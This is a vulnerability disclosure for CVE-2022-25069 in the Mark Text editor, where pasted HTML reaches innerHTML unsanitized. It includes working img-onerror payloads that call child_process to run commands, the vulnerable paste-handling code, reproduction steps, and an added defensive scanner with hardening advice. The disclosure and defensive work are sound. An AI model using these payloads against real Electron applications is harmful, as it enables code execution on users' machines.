
CVE-2022-25069: Security issue: DOM based XSS & RCE - from pasting vulnerable HTML · Issue #2990 · marktext/marktext

Mark Text v0.16.3 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability which allows attackers to perform remote code execution (RCE) via injecting a crafted payload into /lib/contentState/pasteCtrl.js.

Category: CVE
Tags: #xss #vulnerability #windows #linux #js

Description

An attacker can induce Mark Text users to copy the HTML code below to execute a Remote Code Execution attack via XSS.

<!-- for windows -->
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>

<!-- for linux (tested with kali) -->
<table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table>

The above code is inserted into Mark Text's DOM by the source code below, and the remote code execution is performed by calling child_process from the inline script.

// PARAGRAPH_TYPES is imported from elsewhere in the Mark Text code base (not shown here).
ContentState.prototype.checkCopyType = function (html, text) {
  let type = 'normal'

  if (!html && text) {
    type = 'copyAsMarkdown'
    // Only the outermost opening/closing tag pair is inspected; nothing inside is checked.
    const match = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/.exec(text.trim())

    if (match && match[1]) {
      const tag = match[1]

      if (tag === 'table' && match.length === 3 && match[2] === 'table') {
        // Try to import a single table
        const tmp = document.createElement('table')
        // The unsanitized clipboard text is parsed into a live DOM here; any
        // inline event handler it carries fires at this point.
        tmp.innerHTML = text

        if (tmp.childElementCount === 1) {
          return 'htmlToMd'
        }
      }

      // TODO: We could try to import HTML elements such as headings, text and lists to markdown for better UX.
      type = PARAGRAPH_TYPES.find(type => type === tag) ? 'copyAsHtml' : type
    }
  }

  return type
}

  • Can you reproduce the issue?

Steps to reproduce

  1. Copy the vulnerable HTML code
    • <table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
  2. Paste it into Mark Text app

Expected behavior:

HTML should be sanitized before being pasted into the DOM.

Actual behavior:

There is no HTML sanitization procedure. It only checks whether the text is wrapped in <table> or not.

Link to an example: bandicam.2022-02-08.01-33-25-900-cut.mp4, bandicam.2022-02-08.01-33-25-900.mp4

Versions

  • MarkText version: v0.16.3
  • Operating system:
    Windows 11 Version 21H2 - OS Build 22000.469
    Kali Linux Kali GNU/Linux Rolling 2021.4
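
The following is an added example, not code from Mark Text or from the issue reporter. It reuses the outer-tag regex from the checkCopyType excerpt to show that the CVE-2022-25069 payload passes that gate, and then adds a fail-closed check that walks every tag and attribute of the pasted markup before anything is handed to innerHTML. The PARAGRAPH_TYPES list is an assumed subset (the real one is imported elsewhere in Mark Text), the 'plainText' result is an assumed value meaning "insert the clipboard contents as literal text, do not parse them", and the innerHTML-based single-table count from the excerpt is replaced by the outer-tag match, because that DOM step is exactly where the payload fired. The sample inputs are constructed from the issue's Windows payload. It runs under Node without a DOM.

```javascript
// Added example for CVE-2022-25069 (not Mark Text's code): the outer-tag regex is
// not a safety check; a tag/attribute walk that refuses active content is.

// Same regex as the checkCopyType excerpt: it only looks at the outer tag pair.
const OUTER_TAG_RE = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/;

// Assumption: a subset of Mark Text's PARAGRAPH_TYPES, which the excerpt imports.
const PARAGRAPH_TYPES = ['p', 'h1', 'h2', 'h3', 'ul', 'ol', 'blockquote', 'pre', 'table'];

// Sticky (y) tag matcher. Attribute separators accept "/" as well as whitespace,
// because the HTML parser treats "<img/onerror=x>" as an attribute boundary.
const TAG_RE = /<(\/?)([a-zA-Z][a-zA-Z0-9:-]*)((?:[\s\/]+[^\s"'>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)[\s\/]*>/y;
const ATTR_RE = /([^\s"'>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

const ACTIVE_TAGS = new Set(['script', 'iframe', 'frame', 'object', 'embed', 'link', 'meta', 'base']);
const URL_ATTRS = new Set(['href', 'src', 'action', 'formaction', 'xlink:href', 'data']);

// Returns a list of findings; an empty list means nothing active was seen.
function scanMarkup(markup) {
  const findings = [];
  let i = markup.indexOf('<');
  while (i !== -1) {
    TAG_RE.lastIndex = i;
    const m = TAG_RE.exec(markup);
    if (!m) {
      // Comments, doctypes, stray "<" or anything this grammar cannot read:
      // fail closed rather than guess how the real parser would recover.
      findings.push({ kind: 'unparsed', at: i });
      i = markup.indexOf('<', i + 1);
      continue;
    }
    const [, closing, rawTag, attrText] = m;
    const tag = rawTag.toLowerCase();
    if (!closing) {
      if (ACTIVE_TAGS.has(tag)) findings.push({ kind: 'tag', tag });
      for (const a of attrText.matchAll(ATTR_RE)) {
        const name = a[1].toLowerCase();
        const value = a[2] ?? a[3] ?? a[4] ?? '';
        if (name.startsWith('on')) {
          // Inline event handler: this is the onerror in the issue's payload.
          findings.push({ kind: 'handler', tag, attr: name });
        } else if (name === 'srcdoc') {
          findings.push({ kind: 'srcdoc', tag });
        } else if (URL_ATTRS.has(name)) {
          // Strip control chars and whitespace first: "java\tscript:" is still javascript:.
          const scheme = value.replace(/[\u0000-\u0020]/g, '').toLowerCase();
          if (/^(javascript|vbscript):/.test(scheme)) {
            findings.push({ kind: 'scheme', tag, attr: name, scheme: scheme.split(':')[0] });
          }
        }
      }
    }
    i = markup.indexOf('<', TAG_RE.lastIndex);
  }
  return findings;
}

// Hardened version of the decision in checkCopyType. Same return values as the
// excerpt, plus the assumed value 'plainText' when the markup carries active content.
function classifyPaste(html, text) {
  let type = 'normal';
  if (!html && text) {
    type = 'copyAsMarkdown';
    const trimmed = text.trim();
    const match = OUTER_TAG_RE.exec(trimmed);
    if (match && match[1]) {
      const tag = match[1].toLowerCase();
      const findings = scanMarkup(trimmed);
      if (findings.length > 0) return { type: 'plainText', findings };
      if (tag === 'table' && match[2].toLowerCase() === 'table') return { type: 'htmlToMd', findings };
      type = PARAGRAPH_TYPES.includes(tag) ? 'copyAsHtml' : type;
    }
  }
  return { type, findings: [] };
}

// Constructed inputs: the issue's Windows payload and a benign table.
const WINDOWS_PAYLOAD =
  '<table><tr><img src onerror="require(\'child_process\').exec(\'calc.exe\')"></tr></table>';
const BENIGN_TABLE = '<table><tr><td>cell</td></tr></table>';

console.log('outer tags of payload:', OUTER_TAG_RE.exec(WINDOWS_PAYLOAD).slice(1, 3));
console.log('payload:', JSON.stringify(classifyPaste('', WINDOWS_PAYLOAD)));
console.log('benign :', JSON.stringify(classifyPaste('', BENIGN_TABLE)));
```

The scanner is deliberately strict: text containing a bare "<" or an HTML comment is also refused as HTML and falls back to literal text, which is the right failure mode for a paste handler. Two caveats apply. First, a hand-rolled tag grammar is not the HTML5 parser, so in a real Electron renderer the pasted string should be handed to a maintained sanitizer (DOMPurify or equivalent) or parsed into an inert document via DOMParser rather than assigned to innerHTML on a live element; this block only makes the failure of the outer-tag check visible. Second, the payload reaches calc.exe only because require is available in the page: a renderer created with nodeIntegration disabled and contextIsolation enabled in its BrowserWindow webPreferences would reduce this bug from RCE to XSS, so that setting belongs in the fix alongside sanitization.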
